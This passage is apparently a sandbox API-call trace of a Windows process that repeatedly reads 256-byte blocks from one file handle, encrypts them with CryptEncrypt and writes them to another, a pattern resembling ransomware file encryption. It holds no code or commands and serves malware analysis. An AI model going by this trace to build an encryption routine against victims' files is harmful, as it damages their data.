0x0 [0145.287] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.287] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.287] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.287] GetLastError () returned 0x0 [0145.287] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.287] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.288] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.288] GetLastError () returned 0x0 [0145.288] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.288] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.288] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.288] GetLastError () returned 0x0 [0145.288] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.288] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.288] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.288] GetLastError () returned 0x0 [0145.288] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.288] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.288] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.288] GetLastError () returned 0x0 [0145.288] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.288] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.288] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.288] GetLastError () returned 0x0 [0145.288] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.288] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.288] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.288] GetLastError () returned 0x0 [0145.288] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.288] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.288] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.288] GetLastError () returned 0x0 [0145.288] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.289] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.289] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.289] GetLastError () returned 0x0 [0145.289] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.289] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.289] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.289] GetLastError () returned 0x0 [0145.289] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.289] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.289] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.289] GetLastError () returned 0x0 [0145.289] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.289] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.289] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.289] GetLastError () returned 0x0 [0145.289] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.289] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.289] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.289] GetLastError () returned 0x0 [0145.289] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.289] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.289] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.289] GetLastError () returned 0x0 [0145.289] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.290] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.290] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.290] GetLastError () returned 0x0 [0145.290] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.290] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.290] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.290] GetLastError () returned 0x0 [0145.290] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.290] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.290] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.290] GetLastError () returned 0x0 [0145.290] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.290] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.290] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.290] GetLastError () returned 0x0 [0145.290] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.290] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.290] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.290] GetLastError () returned 0x0 [0145.290] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.290] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.290] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.290] GetLastError () returned 0x0 [0145.290] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.290] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.291] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.291] GetLastError () returned 0x0 [0145.291] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.291] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.291] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.291] GetLastError () returned 0x0 [0145.291] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.291] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.291] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.291] GetLastError () returned 0x0 [0145.291] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.291] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.291] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.291] GetLastError () returned 0x0 [0145.291] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.291] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.291] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.291] GetLastError () returned 0x0 [0145.291] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.291] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.291] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.291] GetLastError () returned 0x0 [0145.291] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.291] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.292] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.292] GetLastError () returned 0x0 [0145.292] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.292] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.292] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.292] GetLastError () returned 0x0 [0145.292] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.292] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.292] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.292] GetLastError () returned 0x0 [0145.292] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.292] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.292] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.292] GetLastError () returned 0x0 [0145.292] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.292] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.292] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.292] GetLastError () returned 0x0 [0145.292] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.292] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.292] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.292] GetLastError () returned 0x0 [0145.292] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, 